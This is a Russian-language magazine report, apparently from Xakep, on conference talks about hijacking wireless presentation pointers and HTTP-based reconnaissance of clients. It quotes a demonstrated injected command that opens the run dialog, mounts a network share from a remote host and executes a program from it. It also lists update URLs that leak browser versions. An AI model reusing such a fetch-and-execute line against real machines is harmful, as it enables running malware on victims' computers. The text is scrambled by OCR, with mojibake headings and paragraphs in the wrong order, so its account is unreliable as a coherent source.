Официальный сайт конференции
Утилита Appprint, показывающая информацию о web2.0 исследователь, с беспроводными мышками теоретически возможна та же история, но он не проверял. Как знать, может быть, ты станешь первым, кто это сделает? :) Между делом мы решили проверить радиус действия мышки, и выяснилось, что на расстоянии пяти метров она работает стабильно. Вот почему я всегда пользуюсь тачпадом.
WEB IN THE MIDDLE Пример работы сканера wsscan небезызвестной компании nCircle и автором оригинального движка сканера Ncircle Suite 360. В двух словах — это не очередной студент с академическим буллшитом. Те, кто заинтересовался, могут узнать подробнее об этой коробочке на kane-box.com.
ÏÎÃËÓÌÈÑÜ ÍÀÄ ÑÒÈÂÎÌ ÄÆÎÁÑÎÌ
Многим понравился доклад исследователя Niels Teusink (да простят меня редакторы, но я не стану коверкать имена транслитом) под названием «Hacking Wireless Presenters». Опять-таки, до теории возможной атаки, наверное, догадывался не один исследователь, но этот парень осуществил ее на практике, изучив протокол и соорудив специализированный девайс. Смысл в том, что, если с помощью презентационной указки можно выполнять различные действия с монитором, то почему бы не сэмулировать эти действия своим устройством, посылая аналогичные сигналы. В качестве примера был продемонстрирован следующий набор команд, посланный на компьютер: [Win+R] cmd /c net use x: http://10.1.1.1/x&x:x [Enter]
Следующий интересный доклад, «Web in The Middle», был от Laurent Oudot из компании Tehtri Security. В докладе он описывал различные атаки, которые можно проводить на клиентов, сосредоточившись на HTTP-протоколе. Под «клиентами» он имел в виду различные устройства: от ноутбуков и КПК до с мартфонов, айфонов и новомодного айпада. Итак, первое, что делает атакующий при нападении на клиента — это разведка. Представь себе, что ты перехватываешь общение клиента с каким-либо веб-сервисом, и трафик зашифрован при помощи SSL. Казалось бы, шансы узнать информацию о клиенте в таком случае минимальны, но они есть. Один из примеров — браузер Mozilla периодически отправляет информацию о своей версии на сайт производителя по нешифрованному каналу вот таким вот запросом, что я, кстати, не раз замечал, пользуясь всеми любимой Tamperdata: http://live.mozillamessaging.com/%APP%/ whatsnew?locale=%LOCALE%&version=%VERSION %&os=%OS%&buildid=%APPBUILDID%
Thunderbird тоже светит версию: http://live.mozillamessaging.com/thunderbird/start? locale=en&version=3.0.4&os=Darwin&buildi d=20100317134139
Не говоря уже о продуктах Apple во время работы с iWork и iLife: Таким образом он заставил пользовательский компьютер открыть окно запуска команд, примонтировать сетевой диск и выполнить с него вредоносную программу. Вживую это выглядело довольно шокирующе. Кроме того, как указал в одном из последних слайдов XÀÊÅÐ 10 /141/ 10
apple.com/welcomescreen/ilife09/iphoto/ apple.com/welcomescreen/iwork09/numbers/ apple.com/welcomescreen/iwork09/keynote/
057